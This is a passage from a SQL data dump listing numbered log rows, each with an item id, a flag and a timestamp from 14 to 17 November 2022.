13:59:47'),(63926,3781,1,'2022-11-14','2022-11-14 14:04:09'),(63927,3102,1,'2022-11-14','2022-11-14 14:08:51'),(63928,3721,1,'2022-11-14','2022-11-14 14:18:54'),(63929,1718,1,'2022-11-14','2022-11-14 14:58:07'),(63930,4840,1,'2022-11-14','2022-11-14 15:02:28'),(63931,4520,1,'2022-11-14','2022-11-14 15:28:08'),(63932,4960,1,'2022-11-14','2022-11-14 15:54:20'),(63933,76,1,'2022-11-14','2022-11-14 15:55:21'),(63934,4960,1,'2022-11-14','2022-11-14 15:55:42'),(63935,5163,1,'2022-11-14','2022-11-14 15:56:07'),(63936,5163,1,'2022-11-14','2022-11-14 15:56:40'),(63937,1594,1,'2022-11-14','2022-11-14 16:03:25'),(63938,1594,1,'2022-11-14','2022-11-14 16:06:04'),(63939,84,1,'2022-11-14','2022-11-14 16:06:44'),(63940,3691,1,'2022-11-14','2022-11-14 16:13:19'),(63941,4960,1,'2022-11-14','2022-11-14 16:29:41'),(63942,1701,1,'2022-11-14','2022-11-14 16:33:09'),(63943,4608,1,'2022-11-14','2022-11-14 16:33:40'),(63944,1610,1,'2022-11-14','2022-11-14 16:45:38'),(63945,1594,1,'2022-11-14','2022-11-14 17:48:35'),(63946,1582,1,'2022-11-14','2022-11-14 18:01:52'),(63947,1606,1,'2022-11-14','2022-11-14 18:21:40'),(63948,4420,1,'2022-11-14','2022-11-14 18:53:32'),(63949,3781,1,'2022-11-14','2022-11-14 18:56:35'),(63950,4323,1,'2022-11-14','2022-11-14 19:00:28'),(63951,4729,1,'2022-11-14','2022-11-14 19:03:33'),(63952,1713,1,'2022-11-14','2022-11-14 19:05:57'),(63953,1614,1,'2022-11-14','2022-11-14 19:06:46'),(63954,4420,1,'2022-11-14','2022-11-14 19:10:43'),(63955,4747,1,'2022-11-14','2022-11-14 19:16:40'),(63956,1722,1,'2022-11-14','2022-11-14 19:19:42'),(63957,5125,1,'2022-11-14','2022-11-14 19:22:49'),(63958,5157,1,'2022-11-14','2022-11-14 19:37:43'),(63959,4950,1,'2022-11-14','2022-11-14 19:46:43'),(63960,1612,1,'2022-11-14','2022-11-14 19:56:01'),(63961,2748,1,'2022-11-14','2022-11-14 20:07:48'),(63962,4412,1,'2022-11-14','2022-11-14 20:30:20'),(63963,3781,1,'2022-11-14','2022-11-14 20:36:04'),(63964,3731,1,'2022-11-14','2022-11-14 21:12:19'),(63965,4792,1,'2022-11-14','2022-11-14 21:34:06'),(63966,3489,1,'2022-11-14','2022-11-14 21:39:31'),(63967,1612,1,'2022-11-14','2022-11-14 21:46:19'),(63968,76,1,'2022-11-14','2022-11-14 21:46:35'),(63969,87,1,'2022-11-14','2022-11-14 21:48:15'),(63970,486,1,'2022-11-14','2022-11-14 21:49:01'),(63971,87,1,'2022-11-14','2022-11-14 21:49:29'),(63972,89,1,'2022-11-14','2022-11-14 21:50:27'),(63973,76,1,'2022-11-14','2022-11-14 21:51:40'),(63974,1612,1,'2022-11-14','2022-11-14 21:51:53'),(63975,4797,1,'2022-11-14','2022-11-14 22:01:20'),(63976,4688,1,'2022-11-14','2022-11-14 22:03:43'),(63977,4874,1,'2022-11-14','2022-11-14 22:06:50'),(63978,4688,1,'2022-11-14','2022-11-14 22:12:12'),(63979,2748,1,'2022-11-14','2022-11-14 22:17:54'),(63980,2165,1,'2022-11-14','2022-11-14 22:38:27'),(63981,4457,1,'2022-11-14','2022-11-14 22:40:03'),(63982,1870,1,'2022-11-14','2022-11-14 22:49:21'),(63983,2911,1,'2022-11-14','2022-11-14 22:55:55'),(63984,1711,1,'2022-11-14','2022-11-14 22:59:38'),(63985,3771,1,'2022-11-14','2022-11-14 23:01:57'),(63986,1870,1,'2022-11-14','2022-11-14 23:06:49'),(63987,1770,1,'2022-11-14','2022-11-14 23:07:07'),(63988,1728,1,'2022-11-14','2022-11-14 23:09:17'),(63989,3117,1,'2022-11-14','2022-11-14 23:11:33'),(63990,4238,1,'2022-11-14','2022-11-14 23:14:10'),(63991,87,1,'2022-11-14','2022-11-14 23:18:15'),(63992,4326,1,'2022-11-14','2022-11-14 23:18:43'),(63993,84,1,'2022-11-14','2022-11-14 23:21:09'),(63994,4674,1,'2022-11-14','2022-11-14 23:22:53'),(63995,2989,1,'2022-11-14','2022-11-14 23:23:33'),(63996,3124,1,'2022-11-14','2022-11-14 23:25:55'),(63997,1718,1,'2022-11-14','2022-11-14 23:31:47'),(63998,4694,1,'2022-11-14','2022-11-14 23:33:07'),(63999,2457,1,'2022-11-14','2022-11-14 23:35:30'),(64000,3251,1,'2022-11-14','2022-11-14 23:41:48'),(64001,2395,1,'2022-11-14','2022-11-14 23:45:06'),(64002,3742,1,'2022-11-14','2022-11-14 23:45:16'),(64003,2609,1,'2022-11-14','2022-11-14 23:47:30'),(64004,4404,1,'2022-11-14','2022-11-14 23:50:52'),(64005,3479,1,'2022-11-14','2022-11-14 23:52:17'),(64006,4685,1,'2022-11-14','2022-11-14 23:53:42'),(64007,2178,1,'2022-11-14','2022-11-14 23:54:44'),(64008,4762,1,'2022-11-14','2022-11-14 23:59:29'),(64009,4436,1,'2022-11-15','2022-11-15 00:01:53'),(64010,3243,1,'2022-11-15','2022-11-15 00:04:26'),(64011,3280,1,'2022-11-15','2022-11-15 00:11:53'),(64012,4709,1,'2022-11-15','2022-11-15 00:16:14'),(64013,335,1,'2022-11-15','2022-11-15 00:17:40'),(64014,3534,1,'2022-11-15','2022-11-15 00:18:39'),(64015,3102,1,'2022-11-15','2022-11-15 00:21:06'),(64016,4520,1,'2022-11-15','2022-11-15 00:23:26'),(64017,4765,1,'2022-11-15','2022-11-15 00:25:51'),(64018,3243,1,'2022-11-15','2022-11-15 00:35:28'),(64019,4238,1,'2022-11-15','2022-11-15 00:40:23'),(64020,3117,1,'2022-11-15','2022-11-15 00:47:24'),(64021,4335,1,'2022-11-15','2022-11-15 00:56:13'),(64022,3790,1,'2022-11-15','2022-11-15 00:58:39'),(64023,1598,1,'2022-11-15','2022-11-15 01:01:18'),(64024,4950,1,'2022-11-15','2022-11-15 01:11:54'),(64025,1766,1,'2022-11-15','2022-11-15 01:15:05'),(64026,1724,1,'2022-11-15','2022-11-15 01:18:18'),(64027,1747,1,'2022-11-15','2022-11-15 01:21:25'),(64028,3104,1,'2022-11-15','2022-11-15 01:23:34'),(64029,5128,1,'2022-11-15','2022-11-15 01:24:53'),(64030,5128,1,'2022-11-15','2022-11-15 01:26:27'),(64031,3030,1,'2022-11-15','2022-11-15 01:37:10'),(64032,3430,1,'2022-11-15','2022-11-15 01:40:17'),(64033,2503,1,'2022-11-15','2022-11-15 01:44:28'),(64034,3069,1,'2022-11-15','2022-11-15 01:50:32'),(64035,1612,1,'2022-11-15','2022-11-15 01:51:14'),(64036,3285,1,'2022-11-15','2022-11-15 01:55:28'),(64037,2152,1,'2022-11-15','2022-11-15 01:56:15'),(64038,4492,1,'2022-11-15','2022-11-15 01:59:16'),(64039,4753,1,'2022-11-15','2022-11-15 02:02:27'),(64040,3092,1,'2022-11-15','2022-11-15 02:05:49'),(64041,1612,1,'2022-11-15','2022-11-15 02:09:34'),(64042,2419,1,'2022-11-15','2022-11-15 02:15:01'),(64043,4612,1,'2022-11-15','2022-11-15 02:18:17'),(64044,3226,1,'2022-11-15','2022-11-15 02:21:20'),(64045,3226,1,'2022-11-15','2022-11-15 02:21:22'),(64046,1877,1,'2022-11-15','2022-11-15 02:24:30'),(64047,3788,1,'2022-11-15','2022-11-15 02:33:59'),(64048,3788,1,'2022-11-15','2022-11-15 02:34:00'),(64049,2161,1,'2022-11-15','2022-11-15 02:37:46'),(64050,4930,1,'2022-11-15','2022-11-15 02:40:19'),(64051,2971,1,'2022-11-15','2022-11-15 02:49:46'),(64052,1608,1,'2022-11-15','2022-11-15 02:51:09'),(64053,1608,1,'2022-11-15','2022-11-15 02:53:54'),(64054,4608,1,'2022-11-15','2022-11-15 02:58:20'),(64055,4412,1,'2022-11-15','2022-11-15 03:02:33'),(64056,3275,1,'2022-11-15','2022-11-15 03:03:21'),(64057,3275,1,'2022-11-15','2022-11-15 03:03:24'),(64058,1614,1,'2022-11-15','2022-11-15 03:05:48'),(64059,5134,1,'2022-11-15','2022-11-15 03:08:13'),(64060,3774,1,'2022-11-15','2022-11-15 03:09:31'),(64061,5071,1,'2022-11-15','2022-11-15 03:10:43'),(64062,1722,1,'2022-11-15','2022-11-15 03:11:52'),(64063,3297,1,'2022-11-15','2022-11-15 03:13:04'),(64064,4988,1,'2022-11-15','2022-11-15 03:14:17'),(64065,4980,1,'2022-11-15','2022-11-15 03:17:56'),(64066,3777,1,'2022-11-15','2022-11-15 03:19:10'),(64067,4756,1,'2022-11-15','2022-11-15 03:23:31'),(64068,3127,1,'2022-11-15','2022-11-15 03:26:26'),(64069,4576,1,'2022-11-15','2022-11-15 03:27:37'),(64070,3541,1,'2022-11-15','2022-11-15 03:31:19'),(64071,3313,1,'2022-11-15','2022-11-15 03:37:21'),(64072,4566,1,'2022-11-15','2022-11-15 03:41:00'),(64073,3738,1,'2022-11-15','2022-11-15 03:42:29'),(64074,2156,1,'2022-11-15','2022-11-15 03:43:26'),(64075,3675,1,'2022-11-15','2022-11-15 03:44:39'),(64076,3675,1,'2022-11-15','2022-11-15 03:44:41'),(64077,1743,1,'2022-11-15','2022-11-15 03:45:51'),(64078,5080,1,'2022-11-15','2022-11-15 03:47:36'),(64079,2063,1,'2022-11-15','2022-11-15 03:48:17'),(64080,72,1,'2022-11-15','2022-11-15 03:49:29'),(64081,4448,1,'2022-11-15','2022-11-15 03:55:42'),(64082,1544,1,'2022-11-15','2022-11-15 03:59:28'),(64083,4681,1,'2022-11-15','2022-11-15 04:00:52'),(64084,4338,1,'2022-11-15','2022-11-15 04:02:27'),(64085,1697,1,'2022-11-15','2022-11-15 04:07:55'),(64086,3724,1,'2022-11-15','2022-11-15 04:09:10'),(64087,1707,1,'2022-11-15','2022-11-15 04:10:28'),(64088,1778,1,'2022-11-15','2022-11-15 04:11:42'),(64089,4587,1,'2022-11-15','2022-11-15 04:15:28'),(64090,4561,1,'2022-11-15','2022-11-15 04:16:45'),(64091,4862,1,'2022-11-15','2022-11-15 04:19:14'),(64092,3060,1,'2022-11-15','2022-11-15 04:20:31'),(64093,4657,1,'2022-11-15','2022-11-15 04:23:00'),(64094,3749,1,'2022-11-15','2022-11-15 04:25:48'),(64095,3267,1,'2022-11-15','2022-11-15 04:28:02'),(64096,3735,1,'2022-11-15','2022-11-15 04:29:17'),(64097,3486,1,'2022-11-15','2022-11-15 04:30:34'),(64098,4733,1,'2022-11-15','2022-11-15 04:31:57'),(64099,3005,1,'2022-11-15','2022-11-15 04:33:12'),(64100,1766,1,'2022-11-15','2022-11-15 04:43:50'),(64101,3777,1,'2022-11-15','2022-11-15 04:50:43'),(64102,3127,1,'2022-11-15','2022-11-15 04:51:55'),(64103,1586,1,'2022-11-15','2022-11-15 04:54:09'),(64104,3430,1,'2022-11-15','2022-11-15 04:55:48'),(64105,2161,1,'2022-11-15','2022-11-15 04:58:46'),(64106,3531,1,'2022-11-15','2022-11-15 05:07:29'),(64107,3746,1,'2022-11-15','2022-11-15 05:12:02'),(64108,3278,1,'2022-11-15','2022-11-15 05:12:04'),(64109,4830,1,'2022-11-15','2022-11-15 05:13:12'),(64110,4412,1,'2022-11-15','2022-11-15 05:18:15'),(64111,3104,1,'2022-11-15','2022-11-15 05:19:29'),(64112,2751,1,'2022-11-15','2022-11-15 05:22:52'),(64113,476,1,'2022-11-15','2022-11-15 05:24:37'),(64114,1596,1,'2022-11-15','2022-11-15 05:30:49'),(64115,5076,1,'2022-11-15','2022-11-15 05:30:58'),(64116,4363,1,'2022-11-15','2022-11-15 05:32:03'),(64117,3752,1,'2022-11-15','2022-11-15 05:35:00'),(64118,2775,1,'2022-11-15','2022-11-15 05:37:09'),(64119,4771,1,'2022-11-15','2022-11-15 05:38:55'),(64120,3090,1,'2022-11-15','2022-11-15 05:39:35'),(64121,1734,1,'2022-11-15','2022-11-15 05:42:14'),(64122,3290,1,'2022-11-15','2022-11-15 05:43:23'),(64123,5131,1,'2022-11-15','2022-11-15 05:44:44'),(64124,5050,1,'2022-11-15','2022-11-15 05:45:52'),(64125,2148,1,'2022-11-15','2022-11-15 05:50:55'),(64126,4691,1,'2022-11-15','2022-11-15 05:51:56'),(64127,4874,1,'2022-11-15','2022-11-15 06:24:33'),(64128,3102,1,'2022-11-15','2022-11-15 06:27:58'),(64129,4688,1,'2022-11-15','2022-11-15 08:12:35'),(64130,468,1,'2022-11-15','2022-11-15 08:18:45'),(64131,1544,1,'2022-11-15','2022-11-15 09:36:58'),(64132,3764,1,'2022-11-15','2022-11-15 09:40:32'),(64133,1604,1,'2022-11-15','2022-11-15 09:41:40'),(64134,68,1,'2022-11-15','2022-11-15 09:42:48'),(64135,1604,1,'2022-11-15','2022-11-15 09:43:01'),(64136,4950,1,'2022-11-15','2022-11-15 10:04:44'),(64137,4960,1,'2022-11-15','2022-11-15 10:22:56'),(64138,1612,1,'2022-11-15','2022-11-15 10:24:43'),(64139,80,1,'2022-11-15','2022-11-15 10:46:08'),(64140,4582,1,'2022-11-15','2022-11-15 10:48:22'),(64141,4424,1,'2022-11-15','2022-11-15 10:51:35'),(64142,4424,1,'2022-11-15','2022-11-15 10:51:37'),(64143,4612,1,'2022-11-15','2022-11-15 10:55:42'),(64144,2457,1,'2022-11-15','2022-11-15 11:04:01'),(64145,4966,1,'2022-11-15','2022-11-15 11:06:27'),(64146,4966,1,'2022-11-15','2022-11-15 11:06:27'),(64147,4938,1,'2022-11-15','2022-11-15 11:34:38'),(64148,472,1,'2022-11-15','2022-11-15 11:40:54'),(64149,4960,1,'2022-11-15','2022-11-15 11:54:12'),(64150,1544,1,'2022-11-15','2022-11-15 12:07:25'),(64151,1544,1,'2022-11-15','2022-11-15 12:10:01'),(64152,1602,1,'2022-11-15','2022-11-15 12:10:34'),(64153,1747,1,'2022-11-15','2022-11-15 12:10:37'),(64154,1608,1,'2022-11-15','2022-11-15 12:10:48'),(64155,1586,1,'2022-11-15','2022-11-15 12:11:02'),(64156,1582,1,'2022-11-15','2022-11-15 12:11:15'),(64157,4301,1,'2022-11-15','2022-11-15 12:11:29'),(64158,472,1,'2022-11-15','2022-11-15 12:25:55'),(64159,3117,1,'2022-11-15','2022-11-15 12:40:37'),(64160,3430,1,'2022-11-15','2022-11-15 12:51:26'),(64161,4587,1,'2022-11-15','2022-11-15 12:55:57'),(64162,1722,1,'2022-11-15','2022-11-15 13:13:18'),(64163,1722,1,'2022-11-15','2022-11-15 13:13:33'),(64164,1722,1,'2022-11-15','2022-11-15 13:13:58'),(64165,4870,1,'2022-11-15','2022-11-15 13:18:26'),(64166,3531,1,'2022-11-15','2022-11-15 13:18:27'),(64167,1544,1,'2022-11-15','2022-11-15 13:42:06'),(64168,1722,1,'2022-11-15','2022-11-15 13:52:00'),(64169,2775,1,'2022-11-15','2022-11-15 14:03:10'),(64170,1608,1,'2022-11-15','2022-11-15 14:16:04'),(64171,4753,1,'2022-11-15','2022-11-15 14:25:42'),(64172,4391,1,'2022-11-15','2022-11-15 14:25:57'),(64173,4612,1,'2022-11-15','2022-11-15 14:26:05'),(64174,2297,1,'2022-11-15','2022-11-15 14:34:08'),(64175,2457,1,'2022-11-15','2022-11-15 14:48:45'),(64176,4412,1,'2022-11-15','2022-11-15 14:52:22'),(64177,2457,1,'2022-11-15','2022-11-15 14:54:16'),(64178,1582,1,'2022-11-15','2022-11-15 14:59:22'),(64179,4691,1,'2022-11-15','2022-11-15 15:00:32'),(64180,2419,1,'2022-11-15','2022-11-15 15:15:42'),(64181,72,1,'2022-11-15','2022-11-15 15:32:45'),(64182,1596,1,'2022-11-15','2022-11-15 15:45:24'),(64183,3771,1,'2022-11-15','2022-11-15 15:47:44'),(64184,1582,1,'2022-11-15','2022-11-15 15:49:36'),(64185,1594,1,'2022-11-15','2022-11-15 15:54:25'),(64186,91,1,'2022-11-15','2022-11-15 15:56:40'),(64187,5020,1,'2022-11-15','2022-11-15 15:57:40'),(64188,4874,1,'2022-11-15','2022-11-15 15:58:23'),(64189,91,1,'2022-11-15','2022-11-15 15:58:31'),(64190,1718,1,'2022-11-15','2022-11-15 15:58:58'),(64191,91,1,'2022-11-15','2022-11-15 15:59:13'),(64192,5076,1,'2022-11-15','2022-11-15 16:37:18'),(64193,1596,1,'2022-11-15','2022-11-15 16:47:01'),(64194,2558,1,'2022-11-15','2022-11-15 16:49:26'),(64195,4980,1,'2022-11-15','2022-11-15 16:51:08'),(64196,4980,1,'2022-11-15','2022-11-15 16:53:19'),(64197,4412,1,'2022-11-15','2022-11-15 17:14:37'),(64198,4700,1,'2022-11-15','2022-11-15 17:15:26'),(64199,476,1,'2022-11-15','2022-11-15 17:22:45'),(64200,4668,1,'2022-11-15','2022-11-15 17:27:20'),(64201,2769,1,'2022-11-15','2022-11-15 17:45:13'),(64202,3253,1,'2022-11-15','2022-11-15 18:02:10'),(64203,4950,1,'2022-11-15','2022-11-15 18:15:39'),(64204,2813,1,'2022-11-15','2022-11-15 18:45:26'),(64205,2769,1,'2022-11-15','2022-11-15 18:46:09'),(64206,1614,1,'2022-11-15','2022-11-15 18:56:36'),(64207,3006,1,'2022-11-15','2022-11-15 19:31:24'),(64208,1610,1,'2022-11-15','2022-11-15 19:43:18'),(64209,1610,1,'2022-11-15','2022-11-15 19:43:19'),(64210,472,1,'2022-11-15','2022-11-15 19:47:08'),(64211,4416,1,'2022-11-15','2022-11-15 19:55:45'),(64212,3721,1,'2022-11-15','2022-11-15 20:02:31'),(64213,1608,1,'2022-11-15','2022-11-15 20:08:12'),(64214,2904,1,'2022-11-15','2022-11-15 20:22:26'),(64215,4697,1,'2022-11-15','2022-11-15 20:40:16'),(64216,5024,1,'2022-11-15','2022-11-15 21:01:13'),(64217,5037,1,'2022-11-15','2022-11-15 21:03:02'),(64218,4573,1,'2022-11-15','2022-11-15 21:15:36'),(64219,570,1,'2022-11-15','2022-11-15 21:22:50'),(64220,3664,1,'2022-11-15','2022-11-15 21:32:33'),(64221,3030,1,'2022-11-15','2022-11-15 21:34:13'),(64222,4326,1,'2022-11-15','2022-11-15 21:51:05'),(64223,4591,1,'2022-11-15','2022-11-15 21:56:54'),(64224,1726,1,'2022-11-15','2022-11-15 21:57:36'),(64225,570,1,'2022-11-15','2022-11-15 21:58:41'),(64226,80,1,'2022-11-15','2022-11-15 22:14:15'),(64227,2775,1,'2022-11-15','2022-11-15 22:14:45'),(64228,5062,1,'2022-11-15','2022-11-15 22:22:05'),(64229,3531,1,'2022-11-15','2022-11-15 22:29:01'),(64230,1747,1,'2022-11-15','2022-11-15 22:47:07'),(64231,91,1,'2022-11-15','2022-11-15 22:52:20'),(64232,2457,1,'2022-11-15','2022-11-15 23:06:13'),(64233,1544,1,'2022-11-15','2022-11-15 23:17:11'),(64234,1544,1,'2022-11-15','2022-11-15 23:17:37'),(64235,76,1,'2022-11-15','2022-11-15 23:18:17'),(64236,68,1,'2022-11-15','2022-11-15 23:18:51'),(64237,80,1,'2022-11-15','2022-11-15 23:18:57'),(64238,80,1,'2022-11-15','2022-11-15 23:20:11'),(64239,80,1,'2022-11-15','2022-11-15 23:20:20'),(64240,68,1,'2022-11-15','2022-11-15 23:20:22'),(64241,76,1,'2022-11-15','2022-11-15 23:20:25'),(64242,1544,1,'2022-11-15','2022-11-15 23:20:29'),(64243,1544,1,'2022-11-15','2022-11-15 23:21:20'),(64244,3482,1,'2022-11-15','2022-11-15 23:22:12'),(64245,4238,1,'2022-11-15','2022-11-15 23:24:57'),(64246,3030,1,'2022-11-15','2022-11-15 23:27:21'),(64247,1766,1,'2022-11-15','2022-11-15 23:36:21'),(64248,5134,1,'2022-11-15','2022-11-15 23:55:11'),(64249,1544,1,'2022-11-16','2022-11-16 00:33:14'),(64250,479,1,'2022-11-16','2022-11-16 00:55:22'),(64251,2248,1,'2022-11-16','2022-11-16 01:40:16'),(64252,5071,1,'2022-11-16','2022-11-16 01:52:00'),(64253,3764,1,'2022-11-16','2022-11-16 02:00:37'),(64254,467,1,'2022-11-16','2022-11-16 02:02:54'),(64255,1582,1,'2022-11-16','2022-11-16 02:39:53'),(64256,80,1,'2022-11-16','2022-11-16 02:53:09'),(64257,72,1,'2022-11-16','2022-11-16 03:06:48'),(64258,80,1,'2022-11-16','2022-11-16 03:23:13'),(64259,4323,1,'2022-11-16','2022-11-16 03:31:59'),(64260,2813,1,'2022-11-16','2022-11-16 03:56:54'),(64261,472,1,'2022-11-16','2022-11-16 04:08:13'),(64262,2769,1,'2022-11-16','2022-11-16 04:47:47'),(64263,4691,1,'2022-11-16','2022-11-16 04:51:09'),(64264,5146,1,'2022-11-16','2022-11-16 05:07:53'),(64265,3438,1,'2022-11-16','2022-11-16 05:27:20'),(64266,4691,1,'2022-11-16','2022-11-16 05:45:29'),(64267,4950,1,'2022-11-16','2022-11-16 05:47:21'),(64268,1544,1,'2022-11-16','2022-11-16 05:51:00'),(64269,4744,1,'2022-11-16','2022-11-16 06:05:41'),(64270,1768,1,'2022-11-16','2022-11-16 06:18:19'),(64271,1586,1,'2022-11-16','2022-11-16 06:19:20'),(64272,4524,1,'2022-11-16','2022-11-16 06:33:45'),(64273,3438,1,'2022-11-16','2022-11-16 06:49:16'),(64274,5054,1,'2022-11-16','2022-11-16 06:51:50'),(64275,5054,1,'2022-11-16','2022-11-16 06:52:11'),(64276,1606,1,'2022-11-16','2022-11-16 07:00:54'),(64277,5054,1,'2022-11-16','2022-11-16 07:01:00'),(64278,91,1,'2022-11-16','2022-11-16 07:20:31'),(64279,4424,1,'2022-11-16','2022-11-16 07:53:55'),(64280,4420,1,'2022-11-16','2022-11-16 08:32:51'),(64281,4756,1,'2022-11-16','2022-11-16 08:51:56'),(64282,1544,1,'2022-11-16','2022-11-16 09:12:07'),(64283,1592,1,'2022-11-16','2022-11-16 10:41:49'),(64284,3034,1,'2022-11-16','2022-11-16 11:02:09'),(64285,3691,1,'2022-11-16','2022-11-16 11:41:52'),(64286,3034,1,'2022-11-16','2022-11-16 11:45:14'),(64287,4771,1,'2022-11-16','2022-11-16 11:59:26'),(64288,1734,1,'2022-11-16','2022-11-16 12:04:50'),(64289,4301,1,'2022-11-16','2022-11-16 12:11:23'),(64290,1588,1,'2022-11-16','2022-11-16 12:25:48'),(64291,470,1,'2022-11-16','2022-11-16 12:37:28'),(64292,2419,1,'2022-11-16','2022-11-16 12:40:31'),(64293,2419,1,'2022-11-16','2022-11-16 12:40:33'),(64294,2419,1,'2022-11-16','2022-11-16 12:40:36'),(64295,1745,1,'2022-11-16','2022-11-16 12:40:37'),(64296,3479,1,'2022-11-16','2022-11-16 12:42:47'),(64297,4542,1,'2022-11-16','2022-11-16 12:44:04'),(64298,2813,1,'2022-11-16','2022-11-16 12:47:59'),(64299,3109,1,'2022-11-16','2022-11-16 13:02:33'),(64300,5163,1,'2022-11-16','2022-11-16 13:07:24'),(64301,5163,1,'2022-11-16','2022-11-16 13:09:05'),(64302,5163,1,'2022-11-16','2022-11-16 13:17:49'),(64303,4341,1,'2022-11-16','2022-11-16 13:39:45'),(64304,2658,1,'2022-11-16','2022-11-16 13:39:50'),(64305,4963,1,'2022-11-16','2022-11-16 13:40:33'),(64306,2658,1,'2022-11-16','2022-11-16 13:41:01'),(64307,4963,1,'2022-11-16','2022-11-16 13:41:12'),(64308,4944,1,'2022-11-16','2022-11-16 14:05:07'),(64309,4941,1,'2022-11-16','2022-11-16 14:14:52'),(64310,4691,1,'2022-11-16','2022-11-16 14:17:58'),(64311,1594,1,'2022-11-16','2022-11-16 14:18:24'),(64312,76,1,'2022-11-16','2022-11-16 14:18:48'),(64313,1582,1,'2022-11-16','2022-11-16 14:52:06'),(64314,4944,1,'2022-11-16','2022-11-16 14:52:33'),(64315,91,1,'2022-11-16','2022-11-16 15:00:36'),(64316,484,1,'2022-11-16','2022-11-16 15:41:51'),(64317,3006,1,'2022-11-16','2022-11-16 15:48:00'),(64318,2809,1,'2022-11-16','2022-11-16 15:48:58'),(64319,4771,1,'2022-11-16','2022-11-16 16:15:00'),(64320,3781,1,'2022-11-16','2022-11-16 16:47:24'),(64321,4404,1,'2022-11-16','2022-11-16 17:21:14'),(64322,4706,1,'2022-11-16','2022-11-16 17:52:02'),(64323,1610,1,'2022-11-16','2022-11-16 17:57:40'),(64324,2704,1,'2022-11-16','2022-11-16 18:14:21'),(64325,1610,1,'2022-11-16','2022-11-16 18:16:16'),(64326,4566,1,'2022-11-16','2022-11-16 18:34:18'),(64327,4944,1,'2022-11-16','2022-11-16 19:27:11'),(64328,4944,1,'2022-11-16','2022-11-16 19:27:21'),(64329,4944,1,'2022-11-16','2022-11-16 19:28:05'),(64330,3742,1,'2022-11-16','2022-11-16 19:33:56'),(64331,1582,1,'2022-11-16','2022-11-16 19:54:22'),(64332,4697,1,'2022-11-16','2022-11-16 20:35:10'),(64333,5122,1,'2022-11-16','2022-11-16 20:47:26'),(64334,1872,1,'2022-11-16','2022-11-16 21:08:05'),(64335,4436,1,'2022-11-16','2022-11-16 21:12:43'),(64336,2956,1,'2022-11-16','2022-11-16 21:24:15'),(64337,2804,1,'2022-11-16','2022-11-16 21:40:58'),(64338,570,1,'2022-11-16','2022-11-16 22:00:07'),(64339,3117,1,'2022-11-16','2022-11-16 22:02:24'),(64340,1544,1,'2022-11-16','2022-11-16 22:16:08'),(64341,1728,1,'2022-11-16','2022-11-16 22:27:18'),(64342,1594,1,'2022-11-16','2022-11-16 22:27:56'),(64343,1594,1,'2022-11-16','2022-11-16 22:41:33'),(64344,4729,1,'2022-11-16','2022-11-16 22:45:47'),(64345,2904,1,'2022-11-16','2022-11-16 23:09:46'),(64346,1586,1,'2022-11-17','2022-11-17 00:38:11'),(64347,4448,1,'2022-11-17','2022-11-17 00:51:37'),(64348,2154,1,'2022-11-17','2022-11-17 00:54:22'),(64349,5163,1,'2022-11-17','2022-11-17 00:57:04'),(64350,76,1,'2022-11-17','2022-11-17 00:57:39'),(64351,5163,1,'2022-11-17','2022-11-17 00:58:08'),(64352,2813,1,'2022-11-17','2022-11-17 02:03:57'),(64353,1606,1,'2022-11-17','2022-11-17 03:19:26'),(64354,2813,1,'2022-11-17','2022-11-17 03:34:02'),(64355,1608,1,'2022-11-17','2022-11-17 03:47:56'),(64356,1582,1,'2022-11-17','2022-11-17 03:48:13'),(64357,1602,1,'2022-11-17','2022-11-17 04:31:03'),(64358,1582,1,'2022-11-17','2022-11-17 04:37:29'),(64359,3430,1,'2022-11-17','2022-11-17 04:41:46'),(64360,4654,1,'2022-11-17','2022-11-17 04:52:40'),(64361,1602,1,'2022-11-17','2022-11-17 05:03:12'),(64362,4738,1,'2022-11-17','2022-11-17 05:24:33'),(64363,2658,1,'2022-11-17','2022-11-17 05:36:03'),(64364,4494,1,'2022-11-17','2022-11-17 06:26:26'),(64365,3438,1,'2022-11-17','2022-11-17 06:34:45'),(64366,1872,1,'2022-11-17','2022-11-17 06:38:11'),(64367,3030,1,'2022-11-17','2022-11-17 06:47:56'),(64368,2658,1,'2022-11-17','2022-11-17 07:25:32'),(64369,4738,1,'2022-11-17','2022-11-17 07:38:16'),(64370,4335,1,'2022-11-17','2022-11-17 07:51:00'),(64371,3102,1,'2022-11-17','2022-11-17 08:12:10'),(64372,1596,1,'2022-11-17','2022-11-17 08:15:59'),(64373,80,1,'2022-11-17','2022-11-17 08:16:04'),(64374,1596,1,'2022-11-17','2022-11-17 08:22:32'),(64375,5128,1,'2022-11-17','2022-11-17 08:28:02'),(64376,570,1,'2022-11-17','2022-11-17 08:34:24'),(64377,570,1,'2022-11-17','2022-11-17 08:34:54'),(64378,5163,1,'2022-11-17','2022-11-17 09:41:16'),(64379,470,1,'2022-11-17','2022-11-17 09:44:28'),(64380,1606,1,'2022-11-17','2022-11-17 10:18:40'),(64381,1594,1,'2022-11-17','2022-11-17 10:57:01'),(64382,4663,1,'2022-11-17','2022-11-17 11:05:56'),(64383,2813,1,'2022-11-17','2022-11-17 11:06:39'),(64384,4663,1,'2022-11-17','2022-11-17 11:07:03'),(64385,1604,1,'2022-11-17','2022-11-17 11:13:44'),(64386,4944,1,'2022-11-17','2022-11-17 11:42:38'),(64387,3030,1,'2022-11-17','2022-11-17 12:48:15'),(64388,3030,1,'2022-11-17','2022-11-17 13:00:53'),(64389,1598,1,'2022-11-17','2022-11-17 13:29:00'),(64390,3069,1,'2022-11-17','2022-11-17 13:42:50'),(64391,487,1,'2022-11-17','2022-11-17 13:50:04'),(64392,488,1,'2022-11-17','2022-11-17 13:50:35'),(64393,488,1,'2022-11-17','2022-11-17 13:51:50'),(64394,487,1,'2022-11-17','2022-11-17 13:51:57'),(64395,87,1,'2022-11-17','2022-11-17 13:52:15'),(64396,479,1,'2022-11-17','2022-11-17 13:52:57'),(64397,473,1,'2022-11-17','2022-11-17 14:20:43'),(64398,487,1,'2022-11-17','2022-11-17 15:00:31'),(64399,4618,1,'2022-11-17','2022-11-17 15:05:30'),(64400,468,1,'2022-11-17','2022-11-17 15:08:08'),(64401,1610,1,'2022-11-17','2022-11-17 15:08:22'),(64402,4391,1,'2022-11-17','2022-11-17 15:10:47'),(64403,474,1,'2022-11-17','2022-11-17 15:17:08'),(64404,3694,1,'2022-11-17','2022-11-17 15:20:49'),(64405,470,1,'2022-11-17','2022-11-17 15:32:48'),(64406,3102,1,'2022-11-17','2022-11-17 15:38:19'),(64407,80,1,'2022-11-17','2022-11-17 15:48:04'),(64408,68,1,'2022-11-17','2022-11-17 15:48:10'),(64409,108,1,'2022-11-17','2022-11-17 15:48:15'),(64410,1600,1,'2022-11-17','2022-11-17 15:59:46'),(64411,1600,1,'2022-11-17','2022-11-17 